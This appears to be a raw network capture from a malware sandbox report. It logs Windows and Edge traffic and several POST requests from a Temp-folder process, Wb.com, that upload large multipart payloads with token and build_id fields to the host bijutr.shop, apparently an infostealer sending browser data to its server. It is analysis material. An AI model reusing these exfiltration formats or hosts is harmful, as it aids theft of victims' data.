                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a6009ef67cb1-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      32192.168.2.649931172.64.41.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a60128e10fab-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 15 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomP#)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                      33192.168.2.64993220.198.119.84443
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 44 6d 45 6c 6a 32 73 38 34 55 4b 77 4e 5a 54 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 66 37 64 32 31 66 32 37 63 63 63 64 31 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: DmElj2s84UKwNZTR.1Context: 6af7d21f27cccd11
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 44 6d 45 6c 6a 32 73 38 34 55 4b 77 4e 5a 54 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 66 37 64 32 31 66 32 37 63 63 63 64 31 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 63 71 47 62 59 74 57 34 6f 4b 62 78 7a 47 53 71 76 4c 44 76 42 50 4f 2f 73 6f 6d 33 4f 64 4f 43 45 41 6d 39 2f 67 5a 4c 30 47 64 34 78 53 51 52 33 42 4b 31 6b 4a 68 32 39 37 77 4b 34 2b 4a 52 2f 56 6e 58 64 70 6f 54 62 7a 64 35 77 74 55 67 44 45 34 50 65 4a 74 42 34 6c 4c 43 33 58 4a 57 70 6b 63 4b 42 61 35 59 65 6a 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: DmElj2s84UKwNZTR.2Context: 6af7d21f27cccd11<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 44 6d 45 6c 6a 32 73 38 34 55 4b 77 4e 5a 54 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 66 37 64 32 31 66 32 37 63 63 63 64 31 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: DmElj2s84UKwNZTR.3Context: 6af7d21f27cccd11<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:08 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:08 UTC58INData Raw: 4d 53 2d 43 56 3a 20 76 63 42 72 2b 55 7a 73 63 6b 36 47 53 64 4e 6e 54 78 64 35 2b 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: vcBr+Uzsck6GSdNnTxd5+w.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      34192.168.2.649943188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLN
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 262605
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------XBAIMGLN7QIM7YCTJWLNCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:09 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      35192.168.2.649947188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F
